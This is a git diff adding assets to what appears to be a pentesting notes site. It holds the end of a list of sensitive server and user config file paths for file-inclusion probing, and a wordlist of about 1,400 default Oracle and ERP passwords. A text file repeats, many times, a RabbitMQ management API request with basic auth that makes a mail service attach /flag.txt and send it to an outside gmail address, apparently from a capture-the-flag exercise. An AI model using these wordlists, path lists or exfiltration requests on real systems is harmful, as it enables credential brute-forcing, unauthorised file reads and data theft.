+/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
+/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
+/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
+/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
+/Volumes/webBackup/private/etc/httpd/httpd.conf
+/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
+/web/conf/php.ini
+/WINDOWSphp.ini
+/WINNTphp.ini
+~/.wm_style
+/xamppapachebinphp.ini
+/xampp/logs/access_log
+~/.Xdefaults
+~/.xinitrc
+~/.Xresources
+~/.xsession
\ No newline at end of file
diff --git a/.gitbook/assets/mimidrv.png b/.gitbook/assets/mimidrv.png
new file mode 100644
index 00000000..61a81636
Binary files /dev/null and b/.gitbook/assets/mimidrv.png differ
diff --git a/.gitbook/assets/pass-oracle.txt b/.gitbook/assets/pass-oracle.txt
new file mode 100644
index 00000000..5c42de32
--- /dev/null
+++ b/.gitbook/assets/pass-oracle.txt
@@ -0,0 +1,1402 @@
+06071992
+0racl3
+0RACL3
+0racl38
+0RACL38
+0racl38i
+0RACL38I
+0racl39
+0RACL39
+0racl39i
+0RACL39I
+0racle
+0RACLE
+0racle8
+0RACLE8
+0racle8i
+0RACLE8I
+0racle9
+0RACLE9
+0racle9i
+0RACLE9I
+199220706
+AASH
+ABA1
+abm
+ABM
+adgangskode
+ADGANGSKODE
+adldemo
+ADLDEMO
+admin
+ADMIN
+administrator
+ADMINISTRATOR
+ADS
+ahl
+AHL
+ahm
+AHM
+airoplane
+AIROPLANE
+ak
+AK
+akf7d98s2
+AKF7D98S2
+AL
+ALA1
+ALLUSERS
+alr
+ALR
+AMA1
+AMA2
+AMA3
+AMA4
+AMF
+ams
+AMS
+AMS1
+AMS2
+AMS3
+AMS4
+AMSYS
+amv
+AMV
+AMW
+ANNE
+anonymous
+ANONYMOUS
+AOLDEMO
+ap
+AP
+APA1
+APA2
+APA3
+APA4
+APPLEAD
+applmgr
+APPLMGR
+applsys
+APPLSYS
+applsyspub
+APPLSYSPUB
+apppassword
+APPPASSWORD
+apps
+APPS
+APS1
+APS2
+APS3
+APS4
+aq
+AQ
+aqdemo
+AQDEMO
+aqjava
+AQJAVA
+aquser
+AQUSER
+ar
+AR
+ARA1
+ARA2
+ARA3
+ARA4
+ARS1
+ARS2
+ARS3
+ARS4
+ART
+asf
+ASF
+asg
+ASG
+asl
+ASL
+ASN
+aso
+ASO
+asp
+ASP
+ast
+AST
+AUC_GUEST
+audiouser
+AUDIOUSER
+AUTHORIA
+ax
+AX
+az
+AZ
+B2B
+BAM
+bar
+BAR
+bc4j
+BC4J
+BCA1
+BCA2
+ben
+BEN
+bic
+BIC
+bil
+BIL
+bim
+BIM
+bis
+BIS
+biv
+BIV
+bix
+BIX
+blewis
+BLEWIS
+BMEADOWS
+BNE
+bom
+BOM
+BP01
+BP02
+BP03
+BP04
+BP05
+BP06
+brio_admin
+BRIO_ADMIN
+bsc
+BSC
+bug_reports
+BUG_REPORTS
+BUYACCT
+BUYAPPR1
+BUYAPPR2
+BUYAPPR3
+BUYER
+BUYMTCH
+CAMRON
+CANDICE
+CARL
+CARLY
+CARMEN
+CARRIECONYERS
+CATADMIN
+catalog
+CATALOG
+cct
+CCT
+cdemo82
+CDEMO82
+cdemo83
+CDEMO83
+cdemocor
+CDEMOCOR
+cdemorid
+CDEMORID
+cdemoucb
+CDEMOUCB
+cdouglas
+CDOUGLAS
+ce
+CE
+CEASAR
+centra
+CENTRA
+central
+CENTRAL
+CFD
+CHANDRA
+change_on_install
+CHANGE_ON_INSTALL
+CHARLEY
+CHRISBAKER
+CHRISTIE
+cids
+CIDS
+CINDY
+cis
+CIS
+cisinfo
+CISINFO
+CLARK
+CLAUDE
+clave
+CLAVE
+clerk
+CLERK
+CLINT
+CLN
+cloth
+CLOTH
+cn
+CN
+CNCADMIN
+company
+COMPANY
+compiere
+COMPIERE
+CONNIE
+CONNOR
+CORY
+CRM1
+CRM2
+crp
+CRP
+CRPB733
+CRPCTL
+CRPDTA
+cs
+CS
+CSADMIN
+CSAPPR1
+csc
+CSC
+csd
+CSD
+CSDUMMY
+cse
+CSE
+csf
+CSF
+csi
+CSI
+csl
+CSL
+CSM
+csmig
+CSMIG
+csp
+CSP
+csr
+CSR
+css
+CSS
+ctxdemo
+CTXDEMO
+ctxsys
+CTXSYS
+CTXTEST
+cua
+CUA
+cue
+CUE
+cuf
+CUF
+cug
+CUG
+cui
+CUI
+cun
+CUN
+cup
+CUP
+cus
+CUS
+cz
+CZ
+DAVIDMORGAN
+dbsnmp
+DBSNMP
+dbvision
+DBVISION
+DCM
+DD7333
+DD7334
+DD810
+DD811
+DD812
+DD9
+DDB733
+DDD
+demo
+DEMO
+demo8
+DEMO8
+demo9
+DEMO9
+des
+DES
+des2k
+DES2K
+dev2000_demos
+DEV2000_DEMOS
+DEVB733
+DEVUSER
+dip
+DIP
+DISCOVERER5
+discoverer_admin
+DISCOVERER_ADMIN
+DKING
+DLD
+DMATS
+DMS
+dmsys
+DMSYS
+DOM
+dpfpass
+DPFPASS
+DPOND
+dsgateway
+DSGATEWAY
+dssys
+DSSYS
+d_syspw
+D_SYSPW
+d_systpw
+D_SYSTPW
+dtsp
+DTSP
+DV7333
+DV7334
+DV810
+DV811
+DV812
+DV9
+DVP1
+eaa
+EAA
+eam
+EAM
+east
+EAST
+ec
+EC
+ecx
+ECX
+EDR
+EDWEUL_US
+EDWREP
+EGC1
+EGD1
+EGM1
+EGO
+EGR1
+ejb
+EJB
+ejsadmin
+EJSADMIN
+ejsadmin_password
+EJSADMIN_PASSWORD
+emp
+EMP
+END1
+eng
+ENG
+eni
+ENI
+ENM1
+ENS1
+ENTMGR_CUST
+ENTMGR_PRO
+ENTMGR_TRAIN
+EOPP_PORTALADM
+EOPP_PORTALMGR
+EOPP_USER
+estore
+ESTORE
+EUL_US
+event
+EVENT
+evm
+EVM
+EXA1
+EXA2
+EXA3
+EXA4
+example
+EXAMPLE
+exfsys
+EXFSYS
+EXS1
+EXS2
+EXS3
+EXS4
+extdemo
+EXTDEMO
+extdemo2
+EXTDEMO2
+fa
+FA
+fem
+FEM
+FIA1
+fii
+FII
+finance
+FINANCE
+finprod
+FINPROD
+flm
+FLM
+fnd
+FND
+fndpub
+FNDPUB
+FNI1
+FNI2
+FPA
+fpt
+FPT
+frm
+FRM
+FTA1
+fte
+FTE
+FUN
+fv
+FV
+FVP1
+GALLEN
+GCA1
+GCA2
+GCA3
+GCA9
+GCMGR1
+GCMGR2
+GCMGR3
+GCS
+GCS1
+GCS2
+GCS3
+GEORGIAWINE
+gl
+GL
+GLA1
+GLA2
+GLA3
+GLA4
+GLS1
+GLS2
+GLS3
+GLS4
+gma
+GMA
+GM_AWDA
+GM_COPI
+gmd
+GMD
+GM_DPHD
+gme
+GME
+gmf
+GMF
+gmi
+GMI
+gml
+GML
+GM_MLCT
+gmp
+GMP
+GM_PLADMA
+GM_PLADMH
+GM_PLCCA
+GM_PLCCH
+GM_PLCOMA
+GM_PLCOMH
+GM_PLCONA
+GM_PLCONH
+GM_PLNSCA
+GM_PLNSCH
+GM_PLSCTA
+GM_PLSCTH
+GM_PLVET
+gms
+GMS
+GM_SPO
+GM_STKH
+gpfd
+GPFD
+gpld
+GPLD
+gr
+GR
+GUEST
+hades
+HADES
+HCC
+hcpark
+HCPARK
+HHCFO
+hlw
+HLW
+hobbes
+HOBBES
+hr
+HR
+hri
+HRI
+hvst
+HVST
+hxc
+HXC
+hxt
+HXT
+IA
+iba
+IBA
+IBC
+ibe
+IBE
+ibp
+IBP
+ibu
+IBU
+iby
+IBY
+icdbown
+ICDBOWN
+icx
+ICX
+idemo_user
+IDEMO_USER
+ieb
+IEB
+iec
+IEC
+iem
+IEM
+ieo
+IEO
+ies
+IES
+ieu
+IEU
+iex
+IEX
+ifssys
+IFSSYS
+igc
+IGC
+igf
+IGF
+igi
+IGI
+igs
+IGS
+igw
+IGW
+imageuser
+IMAGEUSER
+imc
+IMC
+imedia
+IMEDIA
+imt
+IMT
+INS1
+INS2
+instance
+INSTANCE
+inv
+INV
+invalid
+INVALID
+Invalid password
+IP
+ipa
+IPA
+ipd
+IPD
+iplanet
+IPLANET
+isc
+ISC
+ISTEWARD
+itg
+ITG
+ja
+JA
+JD7333
+JD7334
+JD9
+JDE
+JDEDBA
+je
+JE
+jetspeed
+JETSPEED
+jg
+JG
+jl
+JL
+JL 
+jmuser
+JMUSER
+john
+JOHN
+JOHNINARI
+jtf
+JTF
+JTI
+jtm
+JTM
+JTR
+jts
+JTS
+JUNK_PS
+JUSTOSHUM
+KELLYJONES
+KEVINDONS
+KPN
+kwalker
+KWALKER
+l2ldemo
+L2LDEMO
+LADAMS
+laskjdf098ksdaf09
+LASKJDF098KSDAF09
+LBA
+lbacsys
+LBACSYS
+LDQUAL
+LHILL
+LIZARD
+LNS
+LQUINCY
+LSA
+manag3r
+MANAG3R
+manager
+MANAGER
+manprod
+MANPROD
+mddata
+MDDATA
+mddemo
+MDDEMO
+mddemo_mgr
+MDDEMO_MGR
+mdsys
+MDSYS
+me
+ME
+mfg
+MFG
+mgr
+MGR
+MGR1
+MGR2
+MGR3
+MGR4
+mgwuser
+MGWUSER
+migrate
+MIGRATE
+MIKEIKEGAMI
+miller
+MILLER
+MJONES
+MLAKE
+MM1
+MM2
+MM3
+MM4
+MM5
+MMARTIN
+mmo2
+MMO2
+mmo3
+MMO3
+moreau
+MOREAU
+mot_de_passe
+MOT_DE_PASSE
+mrp
+MRP
+msc
+MSC
+msd
+MSD
+mso
+MSO
+msr
+MSR
+MST
+mt6ch5
+MT6CH5
+mtrpw
+MTRPW
+mts_password
+MTS_PASSWORD
+mtssys
+MTSSYS
+mumblefratz
+MUMBLEFRATZ
+mwa
+MWA
+mxagent
+MXAGENT
+names
+NAMES
+NEILKATSU
+neotix_sys
+NEOTIX_SYS
+nneulpass
+NNEULPASS
+oas_public
+OAS_PUBLIC
+OBJ7333
+OBJ7334
+OBJB733
+OCA
+ocitest
+OCITEST
+ocm_db_admin
+OCM_DB_ADMIN
+odm
+ODM
+ods
+ODS
+odscommon
+ODSCOMMON
+ods_server
+ODS_SERVER
+oe
+OE
+oemadm
+OEMADM
+oemrep
+OEMREP
+oem_temp
+OEM_TEMP
+okb
+OKB
+okc
+OKC
+oke
+OKE
+oki
+OKI
+OKL
+oko
+OKO
+okr
+OKR
+oks
+OKS
+okx
+OKX
+OL810
+OL811
+OL812
+OL9
+olapdba
+OLAPDBA
+olapsvr
+OLAPSVR
+olapsys
+OLAPSYS
+ont
+ONT
+oo
+OO
+openspirit
+OPENSPIRIT
+opi
+OPI
+ORABAM
+ORABAMSAMPLES
+ORABPEL
+oracache
+ORACACHE
+oracl3
+ORACL3
+oracle
+ORACLE
+oracle8
+ORACLE8
+oracle8i
+ORACLE8I
+oracle9
+ORACLE9
+oracle9i
+ORACLE9I
+oradbapass
+ORADBAPASS
+ORAESB
+ORAOCA_PUBLIC
+oraprobe
+ORAPROBE
+oraregsys
+ORAREGSYS
+ORASAGENT
+orasso
+ORASSO
+orasso_ds
+ORASSO_DS
+orasso_pa
+ORASSO_PA
+orasso_ps
+ORASSO_PS
+orasso_public
+ORASSO_PUBLIC
+orastat
+ORASTAT
+ordcommon
+ORDCOMMON
+ordplugins
+ORDPLUGINS
+ordsys
+ORDSYS
+osm
+OSM
+osp22
+OSP22
+ota
+OTA
+outln
+OUTLN
+owa
+OWA
+OWAPUB
+owa_public
+OWA_PUBLIC
+owf_mgr
+OWF_MGR
+owner
+OWNER
+ozf
+OZF
+ozp
+OZP
+ozs
+OZS
+pa
+PA
+PABLO
+PAIGE
+PAM
+panama
+PANAMA
+paper
+PAPER
+parol
+PAROL
+PARRISH
+PARSON
+passwd
+PASSWD
+passwo1
+PASSWO1
+passwo2
+PASSWO2
+passwo3
+PASSWO3
+passwo4
+PASSWO4
+password
+PASSWORD
+PAT
+PATORILY
+PATRICKSANCHEZ
+patrol
+PATROL
+PATSY
+paul
+PAUL
+PAULA
+PAXTON
+PCA1
+PCA2
+PCA3
+PCA4
+PCS1
+PCS2
+PCS3
+PCS4
+PD7333
+PD7334
+PD810
+PD811
+PD812
+PD9
+PDA1
+PEARL
+PEG
+PENNY
+PEOP1E
+PERCY
+perfstat
+PERFSTAT
+PERRY
+perstat
+PERSTAT
+PETE
+PEYTON
+PHIL
+PJI
+pjm
+PJM
+planning
+PLANNING
+plex
+PLEX
+pm
+PM
+pmi
+PMI
+pn
+PN
+po
+PO
+po7
+PO7
+po8
+PO8
+poa
+POA
+POLLY
+pom
+POM
+PON
+PORTAL
+portal30
+PORTAL30
+portal30_admin
+PORTAL30_ADMIN
+portal30_demo
+PORTAL30_DEMO
+portal30_ps
+PORTAL30_PS
+portal30_public
+PORTAL30_PUBLIC
+portal30_sso
+PORTAL30_SSO
+portal30_sso_admin
+PORTAL30_SSO_ADMIN
+portal30_sso_ps
+PORTAL30_SSO_PS
+portal30_sso_public
+PORTAL30_SSO_PUBLIC
+portal31
+PORTAL31
+PORTAL_APP
+portal_demo
+PORTAL_DEMO
+PORTAL_PUBLIC
+portal_sso_ps
+PORTAL_SSO_PS
+pos
+POS
+powercartuser
+POWERCARTUSER
+PPM1
+PPM2
+PPM3
+PPM4
+PPM5
+primary
+PRIMARY
+PRISTB733
+PRISTCTL
+PRISTDTA
+PRODB733
+PRODCTL
+PRODDTA
+PRODUSER
+PRP
+PS
+PS810
+PS810CTL
+PS810DTA
+PS811
+PS811CTL
+PS811DTA
+PS812
+PS812CTL
+PS812DTA
+psa
+PSA
+psb
+PSB
+PSBASS
+PSEM
+PSFT
+PSFTDBA
+psp
+PSP
+PTADMIN
+PTCNE
+PTDMO
+PTE
+PTESP
+PTFRA
+PTG
+PTGER
+PTJPN
+PTUKE
+PTUPG
+PTWEB
+PTWEBSERVER
+pub
+PUB
+pubsub
+PUBSUB
+pubsub1
+PUBSUB1
+pv
+PV
+PY7333
+PY7334
+PY810
+PY811
+PY812
+PY9
+qa
+QA
+qdba
+QDBA
+QOT
+qp
+QP
+QRM
+qs
+QS
+qs_adm
+QS_ADM
+qs_cb
+QS_CB
+qs_cbadm
+QS_CBADM
+qs_cs
+QS_CS
+qs_es
+QS_ES
+qs_os
+QS_OS
+qs_ws
+QS_WS
+re
+RE
+RENE
+repadmin
+REPADMIN
+reports
+REPORTS
+rep_owner
+REP_OWNER
+RESTRICTED_US
+rg
+RG
+rhx
+RHX
+rla
+RLA
+rlm
+RLM
+RM1
+RM2
+RM3
+RM4
+RM5
+rmail
+RMAIL
+rman
+RMAN
+ROB
+RPARKER
+rrs
+RRS
+RWA1
+SALLYH
+SAM
+sample
+SAMPLE
+sampleatm
+SAMPLEATM
+sap
+SAP
+sapr3
+SAPR3
+SARAHMANDY
+SCM1
+SCM2
+SCM3
+SCM4
+SDAVIS
+sdos_icsap
+SDOS_ICSAP
+secdemo
+SECDEMO
+SEDWARDS
+SELLCM
+SELLER
+SELLTREAS
+senha
+SENHA
+serviceconsumer1
+SERVICECONSUMER1
+SETUP
+sh
+SH
+shelves
+SHELVES
+SID
+si_informtn_schema
+SI_INFORMTN_SCHEMA
+siteminder
+SITEMINDER
+SKAYE
+SKYTETSUKA
+slidepw
+SLIDEPW
+SLSAA
+SLSMGR
+SLSREP
+snowman
+SNOWMAN
+spierson
+SPIERSON
+SRABBITT
+SRALPHS
+SRAY
+SRIVERS
+SSA1
+SSA2
+SSA3
+SSC1
+SSC2
+SSC3
+SSOSDK
+ssp
+SSP
+SSS1
+starter
+STARTER
+steel
+STEEL
+strat_passwd
+STRAT_PASSWD
+supersecret
+SUPERSECRET
+SUPPLIER
+support
+SUPPORT
+SVM7333
+SVM7334
+SVM810
+SVM811
+SVM812
+SVM9
+SVMB733
+SVP1
+swordfish
+SWORDFISH
+swpro
+SWPRO
+swuser
+SWUSER
+SY810
+SY811
+SY812
+SY9
+sympa
+SYMPA
+sys
+SYS
+SYS7333
+SYS7334
+sysadm
+SYSADM
+sysadmin
+SYSADMIN
+SYSB733
+sysman
+SYSMAN
+syspass
+SYSPASS
+sys_stnt
+SYS_STNT
+system
+SYSTEM
+systempass
+SYSTEMPASS
+tahiti
+TAHITI
+TDEMARCO
+tdos_icsap
+TDOS_ICSAP
+tectec
+TECTEC
+test
+TEST
+TESTCTL
+TESTDTA
+testpilot
+TESTPILOT
+test_user
+TEST_USER
+thinsamplepw
+THINSAMPLEPW
+tibco
+TIBCO
+tiger
+TIGER
+tigger
+TIGGER
+tip37
+TIP37
+TRA1
+trace
+TRACE
+travel
+TRAVEL
+TRBM1
+TRCM1
+TRDM1
+TRRM1
+tsdev
+TSDEV
+tsuser
+TSUSER
+turbine
+TURBINE
+TWILLIAMS
+UDDISYS
+ultimate
+ULTIMATE
+um_admin
+UM_ADMIN
+um_client
+UM_CLIENT
+unknown
+UNKNOWN
+user
+USER
+user0
+USER0
+user1
+USER1
+user2
+USER2
+user3
+USER3
+user4
+USER4
+user5
+USER5
+user6
+USER6
+user7
+USER7
+user8
+USER8
+user9
+USER9
+utility
+UTILITY
+utlestat
+UTLESTAT
+vea
+VEA
+veh
+VEH
+vertex_login
+VERTEX_LOGIN
+VIDEO31
+VIDEO4
+VIDEO5
+videouser
+VIDEOUSER
+vif_dev_pwd
+VIF_DEV_PWD
+viruser
+VIRUSER
+VP1
+VP2
+VP3
+VP4
+VP5
+VP6
+vrr1
+VRR1
+vrr2
+VRR2
+WAA1
+WAA2
+WCRSYS
+webcal01
+WEBCAL01
+webdb
+WEBDB
+webread
+WEBREAD
+welcome
+WELCOME
+WELCOME1
+WENDYCHO
+west
+WEST
+wfadmin
+WFADMIN
+wh
+WH
+wip
+WIP
+WIRELESS
+wkadmin
+WKADMIN
+wkproxy
+WKPROXY
+wksys
+WKSYS
+wk_test
+WK_TEST
+wkuser
+WKUSER
+wms
+WMS
+wmsys
+WMSYS
+wob
+WOB
+wood
+WOOD
+wps
+WPS
+wsh
+WSH
+wsm
+WSM
+www
+WWW
+wwwuser
+WWWUSER
+xademo
+XADEMO
+XDO
+xdp
+XDP
+xla
+XLA
+XLE
+XNB
+xnc
+XNC
+xni
+XNI
+xnm
+XNM
+xnp
+XNP
+xns
+XNS
+xprt
+XPRT
+xtr
+XTR
+xxx
+XXX
+YCAMPOS
+yes
+YES
+your_pass
+YOUR_PASS
+YSANCHEZ
+ZFA
+ZPB
+ZSA
+zwerg
+ZWERG
+ZX
diff --git a/.gitbook/assets/pgsql_exec.zip b/.gitbook/assets/pgsql_exec.zip
new file mode 100644
index 00000000..2bd97414
Binary files /dev/null and b/.gitbook/assets/pgsql_exec.zip differ
diff --git a/.gitbook/assets/picklerick.gif b/.gitbook/assets/picklerick.gif
new file mode 100644
index 00000000..a0d85724
Binary files /dev/null and b/.gitbook/assets/picklerick.gif differ
diff --git a/.gitbook/assets/poison (1).jpg b/.gitbook/assets/poison (1).jpg
new file mode 100644
index 00000000..e3a0347c
Binary files /dev/null and b/.gitbook/assets/poison (1).jpg differ
diff --git a/.gitbook/assets/poison.jpg b/.gitbook/assets/poison.jpg
new file mode 100644
index 00000000..e3a0347c
Binary files /dev/null and b/.gitbook/assets/poison.jpg differ
diff --git a/.gitbook/assets/portada-2.png b/.gitbook/assets/portada-2.png
new file mode 100644
index 00000000..5ce83d1d
Binary files /dev/null and b/.gitbook/assets/portada-2.png differ
diff --git a/.gitbook/assets/portada-alcoholica.png b/.gitbook/assets/portada-alcoholica.png
new file mode 100644
index 00000000..f23eaab5
Binary files /dev/null and b/.gitbook/assets/portada-alcoholica.png differ
diff --git a/.gitbook/assets/posts (1).txt b/.gitbook/assets/posts (1).txt
new file mode 100644
index 00000000..fd7b7928
--- /dev/null
+++ b/.gitbook/assets/posts (1).txt	
@@ -0,0 +1,7703 @@
+�PNG
+POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
